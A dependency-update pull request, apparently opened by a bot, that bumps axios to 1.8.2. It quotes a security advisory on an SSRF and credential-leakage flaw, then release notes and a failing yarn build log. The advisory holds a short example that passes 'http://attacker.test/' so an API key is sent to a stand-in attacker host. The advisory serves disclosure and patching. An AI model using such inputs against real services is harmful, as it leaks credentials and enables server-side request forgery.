Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

fix(deps): update dependency axios to v1.8.2 #11

Open
wants to merge 1 commit into
base: main
Choose a base branch
from

Conversation

mend-on-mend[bot]
Copy link

@mend-on-mend mend-on-mend bot commented Mar 9, 2025

This PR contains the following updates:

Package Type Update Change
axios (source) dependencies minor 1.7.7 -> 1.8.2

axios Requests Vulnerable To Possible SSRF and Credential Leakage via Absolute URL

CVE-2025-27152 / GHSA-jr5f-v2jv-69x6

More information

Details

Summary

A previously reported issue in axios demonstrated that using protocol-relative URLs could lead to SSRF (Server-Side Request Forgery).
Reference: axios/axios#6463

A similar problem that occurs when passing absolute URLs rather than protocol-relative URLs to axios has been identified. Even if ⁠baseURL is set, axios sends the request to the specified absolute URL, potentially causing SSRF and credential leakage. This issue impacts both server-side and client-side usage of axios.

Details

Consider the following code snippet:

import axios from "axios";

const internalAPIClient = axios.create({
  baseURL: "http://example.test/api/v1/users/",
  headers: {
    "X-API-KEY": "1234567890",
  },
});

// const userId = "123";
const userId = "http://attacker.test/";

await internalAPIClient.get(userId); // SSRF

In this example, the request is sent to http://attacker.test/ instead of the baseURL. As a result, the domain owner of attacker.test would receive the X-API-KEY included in the request headers.

It is recommended that:

  • When baseURL is set, passing an absolute URL such as http://attacker.test/ to get() should not ignore baseURL.
  • Before sending the HTTP request (after combining the baseURL with the user-provided parameter), axios should verify that the resulting URL still begins with the expected baseURL.
PoC

Follow the steps below to reproduce the issue:

  1. Set up two simple HTTP servers:
mkdir /tmp/server1 /tmp/server2
echo "this is server1" > /tmp/server1/index.html 
echo "this is server2" > /tmp/server2/index.html
python -m http.server -d /tmp/server1 10001 &
python -m http.server -d /tmp/server2 10002 &
  1. Create a script (e.g., main.js):
import axios from "axios";
const client = axios.create({ baseURL: "http://localhost:10001/" });
const response = await client.get("http://localhost:10002/");
console.log(response.data);
  1. Run the script:
$ node main.js
this is server2

Even though baseURL is set to http://localhost:10001/, axios sends the request to http://localhost:10002/.

Impact
  • Credential Leakage: Sensitive API keys or credentials (configured in axios) may be exposed to unintended third-party hosts if an absolute URL is passed.
  • SSRF (Server-Side Request Forgery): Attackers can send requests to other internal hosts on the network where the axios program is running.
  • Affected Users: Software that uses baseURL and does not validate path parameters is affected by this issue.

Severity

  • CVSS Score: Unknown
  • Vector String: CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:N/VA:N/SC:N/SI:N/SA:N/E:P

References

This data is provided by OSV and the GitHub Advisory Database (CC-BY 4.0).


Release Notes

axios/axios (axios)

v1.8.2

Compare Source

Bug Fixes
  • http-adapter: add allowAbsoluteUrls to path building (#​6810) (fb8eec2)
Contributors to this release

v1.8.1

Compare Source

Bug Fixes
  • utils: move generateString to platform utils to avoid importing crypto module into client builds; (#​6789) (36a5a62)
Contributors to this release

v1.8.0

Compare Source

Bug Fixes
Features
Reverts
BREAKING CHANGES
  • code relying on the above will now combine the URLs instead of prefer request URL

  • feat: add config option for allowing absolute URLs

  • fix: add default value for allowAbsoluteUrls in buildFullPath

  • fix: typo in flow control when setting allowAbsoluteUrls

Contributors to this release

1.7.9 (2024-12-04)

Reverts
Contributors to this release

1.7.8 (2024-11-25)

Bug Fixes
Contributors to this release

1.7.7 (2024-08-31)

Bug Fixes
  • fetch: fix stream handling in Safari by fallback to using a stream reader instead of an async iterator; (#​6584) (d198085)
  • http: fixed support for IPv6 literal strings in url (#​5731) (364993f)
Contributors to this release

1.7.6 (2024-08-30)

Bug Fixes
Contributors to this release

1.7.5 (2024-08-23)

Bug Fixes
  • adapter: fix undefined reference to hasBrowserEnv (#​6572) (7004707)
  • core: add the missed implementation of AxiosError#status property; (#​6573) (6700a8a)
  • core: fix ReferenceError: navigator is not defined for custom environments; (#​6567) (fed1a4b)
  • fetch: fix credentials handling in Cloudflare workers (#​6533) (550d885)
Contributors to this release

1.7.4 (2024-08-13)

Bug Fixes
Contributors to this release

1.7.3 (2024-08-01)

Bug Fixes
Contributors to this release

1.7.2 (2024-05-21)

Bug Fixes
Contributors to this release

1.7.1 (2024-05-20)

Bug Fixes
  • fetch: fixed ReferenceError issue when TextEncoder is not available in the environment; (#​6410) (733f15f)
Contributors to this release

v1.7.9

Compare Source

Reverts
Contributors to this release

v1.7.8

Compare Source

Bug Fixes
Contributors to this release

Configuration

📅 Schedule: Branch creation - "" (UTC), Automerge - At any time (no schedule defined).

🚦 Automerge: Disabled by config. Please merge this manually once you are satisfied.

Rebasing: Whenever PR is behind base branch, or you tick the rebase/retry checkbox.

🔕 Ignore: Close this PR and you won't be reminded about these updates again.


  • If you want to rebase/retry this PR, check this box

disabled

Copy link
Author

mend-on-mend bot commented Mar 9, 2025

⚠️ Artifact update problem

Renovate failed to update an artifact related to this branch. You probably do not want to merge this PR as-is.

♻ Renovate will retry this branch, including artifacts, only when one of the following happens:

  • any of the package files in this branch needs updating, or
  • the branch becomes conflicted, or
  • you click the rebase/retry checkbox if found above, or
  • you rename this PR's title to start with "rebase!" to trigger it manually

The artifact failure details are included below:

File name: workspaces/opencost/yarn.lock
➤ YN0000: ┌ Resolution step
➤ YN0002: │ @aws-sdk/token-providers@npm:3.554.0 doesn't provide @aws-sdk/credential-provider-node (pae14f), requested by @aws-sdk/client-sso-oidc
➤ YN0002: │ @backstage-community/plugin-opencost@workspace:plugins/opencost doesn't provide luxon (pf536e), requested by @date-io/luxon
➤ YN0002: │ @backstage-community/plugin-opencost@workspace:plugins/opencost doesn't provide prop-types (p11e8e), requested by @material-ui/pickers
➤ YN0060: │ @backstage-community/plugin-opencost@workspace:plugins/opencost provides react-dom (p8700e) with version 18.2.0, which doesn't satisfy what @material-ui/styles requests
➤ YN0060: │ @backstage-community/plugin-opencost@workspace:plugins/opencost provides react-dom (p2b556) with version 18.2.0, which doesn't satisfy what @material-ui/core and some of its descendants request
➤ YN0060: │ @backstage-community/plugin-opencost@workspace:plugins/opencost provides react-dom (pcf481) with version 18.2.0, which doesn't satisfy what @material-ui/icons requests
➤ YN0060: │ @backstage-community/plugin-opencost@workspace:plugins/opencost provides react-dom (p176c5) with version 18.2.0, which doesn't satisfy what @backstage/core-components and some of its descendants request
➤ YN0060: │ @backstage-community/plugin-opencost@workspace:plugins/opencost provides react-dom (pe7752) with version 18.2.0, which doesn't satisfy what @material-ui/pickers requests
➤ YN0002: │ @backstage/cli@npm:0.28.0 [57f62] doesn't provide typescript (pe2e0f), requested by eslint-plugin-deprecation
➤ YN0002: │ @backstage/cli@npm:0.28.0 [57f62] doesn't provide typescript (p2192f), requested by fork-ts-checker-webpack-plugin
➤ YN0002: │ @backstage/cli@npm:0.28.0 [57f62] doesn't provide typescript (p223f2), requested by rollup-plugin-dts
➤ YN0060: │ @backstage/cli@npm:0.28.0 [57f62] provides webpack-dev-server (p51c78) with version 5.0.4, which doesn't satisfy what @pmmmwh/react-refresh-webpack-plugin requests
➤ YN0060: │ @backstage/frontend-plugin-api@npm:0.9.0 [9c9f0] provides zod (p436a1) with version 3.22.4, which doesn't satisfy what zod-to-json-schema requests
➤ YN0060: │ @backstage/plugin-auth-node@npm:0.5.3 provides zod (peb4fc) with version 3.22.4, which doesn't satisfy what zod-to-json-schema requests
➤ YN0002: │ @backstage/plugin-catalog-react@npm:1.14.0 [9fcec] doesn't provide @testing-library/react (pb0b80), requested by @backstage/frontend-test-utils
➤ YN0060: │ @backstage/plugin-permission-common@npm:0.8.1 provides zod (pecedb) with version 3.22.4, which doesn't satisfy what zod-to-json-schema requests
➤ YN0002: │ @backstage/repo-tools@npm:0.10.0 [57f62] doesn't provide openapi-types (p34f24), requested by @apidevtools/swagger-parser
➤ YN0002: │ @internal/opencost@workspace:. doesn't provide @microsoft/api-extractor-model (p1a80f), requested by @backstage/repo-tools
➤ YN0002: │ @internal/opencost@workspace:. doesn't provide @microsoft/tsdoc (pfd3a8), requested by @backstage/repo-tools
➤ YN0002: │ @internal/opencost@workspace:. doesn't provide @microsoft/tsdoc-config (p9d333), requested by @backstage/repo-tools
➤ YN0002: │ @internal/opencost@workspace:. doesn't provide @types/node (pe392a), requested by knip
➤ YN0002: │ @internal/opencost@workspace:. doesn't provide @useoptic/optic (p2881c), requested by @backstage/repo-tools
➤ YN0002: │ @module-federation/enhanced@npm:0.6.6 [24468] doesn't provide react (p390a2), requested by @module-federation/data-prefetch
➤ YN0002: │ @module-federation/enhanced@npm:0.6.6 [24468] doesn't provide react-dom (p32740), requested by @module-federation/data-prefetch
➤ YN0002: │ @module-federation/manifest@npm:0.6.6 doesn't provide typescript (p87969), requested by @module-federation/dts-plugin
➤ YN0000: │ Some peer dependencies are incorrectly met; run yarn explain peer-requirements <hash> for details, where <hash> is the six-letter p-prefixed code
➤ YN0000: └ Completed in 0s 678ms
➤ YN0000: ┌ Fetch step
➤ YN0013: │ 2391 packages were already cached
➤ YN0000: └ Completed in 0s 500ms
➤ YN0000: ┌ Link step
➤ YN0007: │ @internal/opencost@workspace:. must be built because it never has been before or the last one failed
➤ YN0007: │ esbuild@npm:0.24.0 must be built because it never has been before or the last one failed
➤ YN0007: │ @swc/core@npm:1.4.13 [24468] must be built because it never has been before or the last one failed
➤ YN0007: │ esbuild@npm:0.20.2 must be built because it never has been before or the last one failed
➤ YN0007: │ canvas@npm:2.11.2 must be built because it never has been before or the last one failed
➤ YN0007: │ core-js-pure@npm:3.31.0 must be built because it never has been before or the last one failed
➤ YN0007: │ @nestjs/core@npm:10.3.0 [0d0d2] must be built because it never has been before or the last one failed
➤ YN0007: │ cpu-features@npm:0.0.9 must be built because it never has been before or the last one failed
➤ YN0000: │ @nestjs/core@npm:10.3.0 [0d0d2] STDERR (node:851993) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.
➤ YN0000: │ @nestjs/core@npm:10.3.0 [0d0d2] STDERR (Use `node --trace-deprecation ...` to show where the warning was created)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp info it worked if it ends with ok
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp info using [email protected]
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp info using [email protected] | linux | x64
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: ┌ Resolution step
➤ YN0000: │ canvas@npm:2.11.2 STDERR (node:851999) [DEP0040] DeprecationWarning: The `punycode` module is deprecated. Please use a userland alternative instead.
➤ YN0000: │ canvas@npm:2.11.2 STDERR (Use `node --trace-deprecation ...` to show where the warning was created)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp http GET https://github.com/Automattic/node-canvas/releases/download/v2.11.2/canvas-v2.11.2-node-v127-linux-glibc-x64.tar.gz
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info it worked if it ends with ok
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info using [email protected]
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info using [email protected] | linux | x64
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info find Python using Python version 3.13.2 found at "/opt/containerbase/tools/python/3.13.2/bin/python3"
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage-community/plugins@workspace:. doesn't provide @typescript-eslint/parser (pd57d3), requested by @spotify/eslint-plugin
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage/cli@npm:0.26.11 [f251d] doesn't provide typescript (pbd0d8), requested by eslint-plugin-deprecation
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage/cli@npm:0.26.11 [f251d] doesn't provide typescript (p4a678), requested by fork-ts-checker-webpack-plugin
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage/cli@npm:0.26.11 [f251d] doesn't provide typescript (pe8a13), requested by rollup-plugin-dts
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0060: │ @backstage/cli@npm:0.26.11 [f251d] provides webpack-dev-server (p6c946) with version 5.0.4, which doesn't satisfy what @pmmmwh/react-refresh-webpack-plugin requests
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage/cli@npm:0.27.1 [b94b1] doesn't provide typescript (pede04), requested by eslint-plugin-deprecation
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage/cli@npm:0.27.1 [b94b1] doesn't provide typescript (pcc1bf), requested by fork-ts-checker-webpack-plugin
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @backstage/cli@npm:0.27.1 [b94b1] doesn't provide typescript (pac006), requested by rollup-plugin-dts
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0060: │ @backstage/cli@npm:0.27.1 [b94b1] provides webpack-dev-server (pa7730) with version 5.0.4, which doesn't satisfy what @pmmmwh/react-refresh-webpack-plugin requests
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @module-federation/enhanced@npm:0.6.6 [12a87] doesn't provide react (pb2946), requested by @module-federation/data-prefetch
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @module-federation/enhanced@npm:0.6.6 [12a87] doesn't provide react-dom (p98667), requested by @module-federation/data-prefetch
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @module-federation/manifest@npm:0.1.21 doesn't provide typescript (pdf6c8), requested by @module-federation/dts-plugin
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @module-federation/manifest@npm:0.6.6 doesn't provide typescript (p87969), requested by @module-federation/dts-plugin
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0002: │ @module-federation/rspack@npm:0.1.21 doesn't provide typescript (pc33a8), requested by @module-federation/dts-plugin
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: │ Some peer dependencies are incorrectly met; run yarn explain peer-requirements <hash> for details, where <hash> is the six-letter p-prefixed code
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: └ Completed in 0s 220ms
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: ┌ Fetch step
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT 
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn /opt/containerbase/tools/python/3.13.2/bin/python3
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args [
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/gyp/gyp_main.py',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args 'binding.gyp',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-f',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args 'make',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-I',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/cpu-features/build/config.gypi',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-I',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/addon.gypi',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-I',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '/home/ubuntu/.cache/node-gyp/22.13.1/include/node/common.gypi',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dlibrary=shared_library',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dvisibility=default',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dnode_root_dir=/home/ubuntu/.cache/node-gyp/22.13.1',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dnode_gyp_dir=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dnode_lib_file=/home/ubuntu/.cache/node-gyp/22.13.1/<(target_arch)/node.lib',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dmodule_root_dir=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/cpu-features',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Dnode_engine=v8',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '--depth=.',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '--no-parallel',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '--generator-output',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args 'build',
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args '-Goutput_dir=.'
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args ]
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn make
➤ YN0000: │ cpu-features@npm:0.0.9 STDERR gyp info spawn args [ 'BUILDTYPE=Release', '-C', 'build' ]
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT make: Entering directory '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/cpu-features/build'
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_aarch64_linux_or_android.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_aarch64_macos_or_iphone.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_arm_linux_or_android.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_mips_linux_or_android.o
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! install response status 404 Not Found on https://github.com/Automattic/node-canvas/releases/download/v2.11.2/canvas-v2.11.2-node-v127-linux-glibc-x64.tar.gz 
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp WARN Pre-built binaries not installable for [email protected] and [email protected] (node-v127 ABI, glibc) (falling back to source compile with node-gyp) 
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp WARN Hit error response status 404 Not Found on https://github.com/Automattic/node-canvas/releases/download/v2.11.2/canvas-v2.11.2-node-v127-linux-glibc-x64.tar.gz 
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_ppc_linux.o
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info it worked if it ends with ok
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info using [email protected]
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info using [email protected] | linux | x64
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_x86_freebsd.o
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0013: │ 1644 packages were already cached
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: └ Completed in 0s 361ms
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info ok 
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_x86_linux_or_android.o
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info it worked if it ends with ok
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info using [email protected]
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info using [email protected] | linux | x64
➤ YN0000: │ @internal/opencost@workspace:. STDOUT ➤ YN0000: ┌ Link step
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info find Python using Python version 3.13.2 found at "/opt/containerbase/tools/python/3.13.2/bin/python3"
➤ YN0000: │ canvas@npm:2.11.2 STDOUT 
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn /opt/containerbase/tools/python/3.13.2/bin/python3
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args [
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/gyp/gyp_main.py',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args 'binding.gyp',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-f',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args 'make',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-I',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/config.gypi',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-I',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/addon.gypi',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-I',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '/home/ubuntu/.cache/node-gyp/22.13.1/include/node/common.gypi',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dlibrary=shared_library',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dvisibility=default',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dnode_root_dir=/home/ubuntu/.cache/node-gyp/22.13.1',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dnode_gyp_dir=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dnode_lib_file=/home/ubuntu/.cache/node-gyp/22.13.1/<(target_arch)/node.lib',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dmodule_root_dir=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Dnode_engine=v8',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '--depth=.',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '--no-parallel',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '--generator-output',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args 'build',
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args '-Goutput_dir=.'
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp info spawn args ]
➤ YN0000: │ canvas@npm:2.11.2 STDERR Package pixman-1 was not found in the pkg-config search path.
➤ YN0000: │ canvas@npm:2.11.2 STDERR Perhaps you should add the directory containing `pixman-1.pc'
➤ YN0000: │ canvas@npm:2.11.2 STDERR to the PKG_CONFIG_PATH environment variable
➤ YN0000: │ canvas@npm:2.11.2 STDERR Package 'pixman-1', required by 'virtual:world', not found
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp: Call to 'pkg-config pixman-1 --libs' returned exit status 1 while in binding.gyp. while trying to load binding.gyp
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! configure error 
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! stack Error: `gyp` failed with exit code: 1
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! stack at ChildProcess.<anonymous> (/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/lib/configure.js:297:18)
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! stack at ChildProcess.emit (node:events:524:28)
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! stack at ChildProcess._handle.onexit (node:internal/child_process:293:12)
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! System Linux 6.1.128-136.201.amzn2023.x86_64
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! command "/opt/containerbase/tools/node/22.13.1/bin/node" "/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/bin/node-gyp.js" "configure" "--fallback-to-build" "--update-binary" "--module=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/Release/canvas.node" "--module_name=canvas" "--module_path=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/Release" "--napi_version=9" "--node_abi_napi=napi" "--napi_build_version=0" "--node_napi_label=node-v127"
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! cwd /tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! node -v v22.13.1
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! node-gyp -v v10.1.0
➤ YN0000: │ canvas@npm:2.11.2 STDERR gyp ERR! not ok 
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! build error 
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! stack Error: Failed to execute '/opt/containerbase/tools/node/22.13.1/bin/node /tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/bin/node-gyp.js configure --fallback-to-build --update-binary --module=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/Release/canvas.node --module_name=canvas --module_path=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/Release --napi_version=9 --node_abi_napi=napi --napi_build_version=0 --node_napi_label=node-v127' (1)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! stack     at ChildProcess.<anonymous> (/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/@mapbox/node-pre-gyp/lib/util/compile.js:89:23)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! stack     at ChildProcess.emit (node:events:524:28)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! stack     at maybeClose (node:internal/child_process:1101:16)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! stack     at ChildProcess._handle.onexit (node:internal/child_process:304:5)
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! System Linux 6.1.128-136.201.amzn2023.x86_64
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! command "/opt/containerbase/tools/node/22.13.1/bin/node" "/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/@mapbox/node-pre-gyp/bin/node-pre-gyp" "install" "--fallback-to-build" "--update-binary"
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! cwd /tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! node -v v22.13.1
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! node-pre-gyp -v v1.0.11
➤ YN0000: │ canvas@npm:2.11.2 STDERR node-pre-gyp ERR! not ok 
➤ YN0000: │ canvas@npm:2.11.2 STDOUT Failed to execute '/opt/containerbase/tools/node/22.13.1/bin/node /tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/node-gyp/bin/node-gyp.js configure --fallback-to-build --update-binary --module=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/Release/canvas.node --module_name=canvas --module_path=/tmp/renovate/repos/github/mend/backstage-community-plugins/workspaces/opencost/node_modules/canvas/build/Release --napi_version=9 --node_abi_napi=napi --napi_build_version=0 --node_napi_label=node-v127' (1)
➤ YN0009: │ canvas@npm:2.11.2 couldn't be built successfully (exit code 1, logs can be found here: /tmp/xfs-703bd499/build.log)
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_x86_macos.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/impl_x86_windows.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/filesystem.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/stack_line_reader.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT   CC(target) Release/obj.target/cpu_features/deps/cpu_features/src/string_view.o
➤ YN0000: │ cpu-features@npm:0.0.9 STDOUT rm -f Release/obj.target/deps/cpu_features/cpu_features.a Release/obj.target/deps/cpu_features/cpu_features.a.ar-file-list; mkdir -p `dirname Release/obj.target/deps/cpu_features/cpu_features.a`
